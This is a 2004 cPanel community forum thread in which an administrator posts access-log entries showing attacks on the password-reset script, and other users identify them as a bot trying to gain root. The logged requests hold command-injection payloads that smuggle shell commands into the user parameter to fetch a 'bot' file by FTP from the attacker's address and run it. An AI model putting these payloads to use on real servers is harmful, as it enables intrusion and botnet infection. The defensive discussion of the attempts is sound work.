The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

cpanel hack attempts through resetpass script

Discussion in 'General Discussion' started by dezignguy, Dec 18, 2004.

  1. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    Hmm, I noticed these attempts to get into my server in the cpanel log... there were more than just these as well.


    Code:
    69.242.156.150 -  [14/Dec/2004:16:43:13 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}open${BLA}69.242.156.150${BLA}28827\\nuser${BLA}ftp${BLA}bla\\nget${BLA}bot\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0" 200 0 "" ""
    69.242.156.150 -  [14/Dec/2004:16:43:13 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0" 200 0 "" ""
    
    69.159.71.154 -  [17/Dec/2004:12:33:23 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}open${BLA}69.159.71.154${BLA}3528\\nuser${BLA}ftp${B$A}bla\\nget${BLA}bot\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0" 200 0 "" ""
    69.159.71.154 -  [17/Dec/2004:12:33:24 -0800] "GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0" 200 0 "" ""
    
    I know there's a 200 successful code there... but I checked and they get back a page with "This feature is disabled."

    I'm fairly sure that this had to do with the cpanel hack a while back where the 'allow users to reset their password by email' function had a security hole and allowed hackers into the server, where they could then try a local root exploit to totally 0wn the box. Since my clients don't use it anyways, I totally disabled the function even after it had been fixed. But I guess there are enough people running old cpanel versions to make it somewhat worthwhile to scan a bunch of hosts for this hack? Or is this a new security problem?
     
    #1 dezignguy, Dec 18, 2004
    Last edited: Dec 18, 2004
  2. brentp

    brentp Well-Known Member

    Joined:
    Mar 11, 2004
    Messages:
    324
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Ayr, North Queensland, Australia
    Phatbot

    Yes, That was a zombie trying to get root on your box, i will have to submit the source code of that exploit to cpanel sometime soon. Just dont re-enable that page cause im sure that bug might not have been fixed. It might've i dont know.

    Regards,
    Brent
     
  3. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    I thought it was fixed on a older stable.
     
  4. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    That's what I thought too...
    But the setting is staying off anyways... just in case.
     
  5. navmonkey

    navmonkey Well-Known Member

    Joined:
    Aug 19, 2003
    Messages:
    47
    Likes Received:
    0
    Trophy Points:
    6
    Is there any problem to activate the reset password option in the latest Stable release? Thanks.
     
  6. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    We have it enabled on all our boxes and we have no issues. We enabled the feature shortly after cpanel released a fix a while back.
     
  7. oshs

    oshs Well-Known Member
    PartnerNOC

    Joined:
    Sep 5, 2004
    Messages:
    146
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    Where are these Cpanel logs available please?
     
  8. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    Guessing '/usr/local/cpanel/logs' perhaps?
     
Loading...

Share This Page